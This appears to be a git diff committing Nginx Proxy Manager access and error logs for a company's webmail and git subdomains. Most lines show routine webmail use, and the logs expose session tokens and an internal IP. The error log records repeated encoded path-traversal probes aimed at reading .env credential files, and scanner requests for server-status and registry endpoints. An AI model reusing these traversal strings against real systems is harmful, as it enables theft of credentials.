[14/Feb/2026:23:49:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:49:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:50:21 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:50:24 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=ODOuYFc2DyK5eCI0fNzAIvMlUNQNSQ5a" [Client 222.117.41.51] [Length 11601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771113024857" [Client 222.117.41.51] [Length 361] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:24 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771113024911&_=1771113024856" [Client 222.117.41.51] [Length 3560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:30 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13701&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4788] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:30 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/fonts/roboto-v29-italic.woff2" [Client 222.117.41.51] [Length 54136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:30 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=contact%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:50:34 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13700&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:01:44 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 91.231.89.126] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[15/Feb/2026:00:08:32 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.40] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[15/Feb/2026:00:08:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 91.196.152.44] [Length 39183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[15/Feb/2026:00:11:28 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2540] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:11:31 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:31 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=PX9O3wwPMAia6ERyftyE6SFWPXZhavYz" [Client 222.117.41.51] [Length 11602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771114292227" [Client 222.117.41.51] [Length 360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:32 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771114292277&_=1771114292226" [Client 222.117.41.51] [Length 3562] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:36 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13701&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4775] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13700&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:12:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:13:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:14:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:15:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:16:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:16:54 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/favicon.png" [Client 91.196.152.150] [Length 17611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[15/Feb/2026:00:17:32 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:19:34 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:20:35 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:13 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:31:16 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=Q53wy8xoXcJdO7D9nEABPCLmeMS9PMYK" [Client 222.117.41.51] [Length 11602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771115476695" [Client 222.117.41.51] [Length 360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771115476750&_=1771115476694" [Client 222.117.41.51] [Length 3562] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 11602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:31:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771115481054" [Client 222.117.41.51] [Length 360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:31:21 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771115481079&_=1771115481053" [Client 222.117.41.51] [Length 3562] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:55:14 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 147.93.155.10] [Length 10723] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 13; Pixel 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.107 Mobile Safari/537.36" "-"
|
||||||
28
npm/data/logs/proxy-host-3_error.log
Normal file
28
npm/data/logs/proxy-host-3_error.log
Normal file
@@ -0,0 +1,28 @@
|
|||||||
|
2026/02/14 23:40:14 [warn] 508#508: *770 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:40:18 [warn] 510#510: *785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:40:37 [warn] 508#508: *770 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:38 [warn] 507#507: *871 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:39 [warn] 507#507: *875 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:43 [warn] 507#507: *892 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:43 [warn] 512#512: *821 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:44 [warn] 507#507: *895 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:44 [warn] 507#507: *896 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:45 [warn] 507#507: *897 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:45 [warn] 507#507: *898 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:45 [warn] 507#507: *900 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:46 [warn] 507#507: *899 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:46 [warn] 507#507: *902 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:46 [warn] 507#507: *903 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:54 [warn] 507#507: *924 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:40:55 [warn] 507#507: *928 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 23:48:20 [warn] 506#506: *1058 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr"
|
||||||
|
2026/02/14 23:48:50 [warn] 506#506: *1058 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:51 [warn] 506#506: *1116 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:52 [warn] 506#506: *1117 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:53 [warn] 506#506: *1118 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:54 [warn] 506#506: *1119 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:55 [warn] 506#506: *1120 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:56 [warn] 506#506: *1121 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/14 23:48:57 [warn] 509#509: *1122 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
|
||||||
149
npm/data/logs/proxy-host-4_access.log
Normal file
149
npm/data/logs/proxy-host-4_access.log
Normal file
@@ -0,0 +1,149 @@
|
|||||||
|
[15/Feb/2026:01:52:09 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:52:12 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:01:52:12 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:13 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:13 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/server" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:14 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/server" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:14 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/server-status" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:15 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/server-status" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:16 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/about" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:17 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/about" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/login.action" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:18 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/login.action" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:18 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v2/_catalog" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:19 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v2/_catalog" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
